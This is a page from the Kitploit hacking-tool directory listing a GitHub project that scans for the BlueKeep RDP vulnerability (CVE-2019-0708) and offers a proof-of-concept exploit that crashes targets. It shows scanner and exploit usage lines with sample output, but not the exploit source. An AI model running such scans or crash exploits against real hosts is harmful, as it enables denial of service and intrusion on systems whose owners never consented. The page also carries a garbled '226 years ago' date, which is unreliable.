Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-0708 — CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。 | Kitploit
Tools/GitHubGitHub/skommando/cve-2019-0708
ReconnaissanceVulnerability ScannersExploitationInformation GatheringPenetration Testing
GitHubskommando/cve-2019-0708

CVE-2019-0708

CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。

View Repository
226 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-0708

CVE-2019-0708 BlueKeep vulnerability batch scanning tool and POC. Currently only causes a blue screen.

0x01 Scanning - Windows

usage:
rdpscan.exe ip1-ip2

root@kitploit:~
> .\rdpscan.exe 192.168.1.1-192.168.1.2
192.168.1.1 - VULNERABLE - CVE-2019-0708
192.168.1.2 - SAFE - CredSSP/NLA required

rdpscan.exe --file ip.txt

root@kitploit:~
> .\rdpscan.exe --file ip.txt
192.168.1.1 - VULNERABLE - CVE-2019-0708
192.168.1.2 - SAFE - CredSSP/NLA required

0x02 POC Exploitation

usage:
python poc.py ip bitness

root@kitploit:~
> python .\cve-2019-0708-poc.py 192.168.1.1 32
[+] ClientData Packet Sent
[+] ChannelJoin/ErectDomain/AttachUser Sent
[+] ClientInfo Packet Sent
[+] ConfirmActive Packet Sent
[+] Session Established
[+] Vuln Should Trigger
Download Tool